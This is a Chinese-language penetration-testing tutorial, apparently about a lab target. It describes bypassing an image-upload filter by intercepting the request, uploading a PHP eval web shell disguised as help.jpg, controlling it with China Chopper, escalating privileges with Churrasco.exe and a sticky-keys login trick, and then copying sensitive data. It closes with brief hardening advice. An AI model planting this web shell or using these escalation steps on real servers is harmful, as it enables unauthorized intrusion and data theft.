一次图文并茂的***完整测试

 任务：某公司受权你对其服务器进行******。对某核心服务器进行***测试，据了解，该web服务器ip地址（10.1.1.178）存在敏感数据。

      一、利用网站漏洞获取该服务器shell

      二、新建一用户并将权限提高至管理员

      三、得到服务器上的关键敏感数据（C:\console）内。

此文只做为学习

***流程

一、探测信息

二、利用漏洞获得管理帐号密码

三、找到后台

四、登陆后台取得web权限

若是发现直接有上传漏洞就能够利用

1.找到上传漏洞

首先知道ip地址后打开网页访问找到站内上传点

上传小马文件报错，只能上传图像文件，只能进行抓包

先进行代理设置

2.代理设置

谷歌插件Proxy SwitchySharp进行代理设置，而后开启burpsuite抓包这里就不作介绍了

软件教学能够百度去学习代理端口要同样

3.抓包分析，并改包上传

开始抓包

help.jpg内容

<?php 
eval($_POST['hao']); 
?>

修改从新上传，上传成功。

4.获取webshell权限

上述的http就是小马地址，打开中国菜刀输入

获取webshell

5.提高管理权限

新建一用户并将权限提高至管理员

用cmd命令获取管理员权限

添加一个用户hao而后让他加入管理员组但是失败了，没办法只能在此使用工具提权

上传脚本，而后重命名，并把php脚本复制到刚才脚本里从新命名后缀php

在网站提权中咱们常常会使用到这些工具Churrasco.exe (巴西烤肉) 

若是说webshell不能执行cmd那么咱们就须要上传一个cmd

若是说上传cmd后不能添加用户那么我咱们就须要上传软件提权

设置终端路径

提权不成功没有administrators组

进入远程桌面登录界面  按shift5次获得cmd whoami /all

咱们找到useras这个组加入进去就ok了

一次图文并茂的***结束了。拷贝敏感数据就能够了,让你们以为***不在神秘，其实更高层次的技术也在研究中，下次带来sqlmap 注入实践教程。

6.安全建议：从上述***测试中发现该服务器

1.及时修补系统中的安全漏洞

2.细化服务器文件目录权限，杜绝权限漏洞

3.对于上传权限，能够经过修改服务器的配置来实现对这个漏洞的预防。不少网站都容许用户上传必定数量的图片、Flash 等，不少时候网站开发人员为了往后管理方便，对上传的文件都统一放到指定的一个文件夹里面，管理员只要对该文件夹的执行权限设置成“无”，这样必定程度能够对漏洞进行预防。